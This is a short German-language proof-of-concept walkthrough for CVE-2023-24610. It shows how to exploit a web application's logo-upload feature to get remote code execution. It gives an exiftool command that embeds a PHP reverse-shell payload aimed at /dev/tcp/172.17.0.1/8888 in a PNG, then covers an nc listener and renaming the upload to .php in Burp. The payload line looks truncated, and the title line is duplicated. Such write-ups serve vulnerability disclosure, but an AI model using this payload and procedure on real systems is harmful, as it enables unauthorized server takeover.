
Dies ist ein Proof-of-Concept für CVE-2023-24610
Dies ist ein Proof of Concept für CVE-2023-24610
Wir beginnen mit der Erstellung einer Polyglot-Datei mit exiftool: exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

Wir ändern die Datei in png, damit sie die Frontend-Prüfung besteht.

Danach starten wir einen nc-Listener auf Port 8888, um die Shell zu empfangen.

Der nächste Schritt ist, sich in der Anwendung anzumelden und auf Setup zu klicken.

Am unteren Ende der Seite sehen wir einen Bereich für das Praxislogo. Wir können eine Datei über den Bearbeiten-Button auf der rechten Seite hochladen.

Wir klicken auf Bearbeiten und dann auf Durchsuchen, wir wählen die „.png“-Datei aus, die wir im ersten Schritt erstellt haben.

Bevor wir auf Hochladen klicken, stellen wir sicher, dass wir die Anfrage mit Burp oder ähnlichem abfangen. Wir klicken auf Hochladen und ändern in Burp die Dateierweiterung von „png“ zu „php“

Wir schalten den Intercept aus, damit unsere Datei hochgeladen wird, und überprüfen den zuvor gestarteten nc-Listener. Wir haben eine Reverse-Shell und die IP zeigt auf unseren Docker-Container.
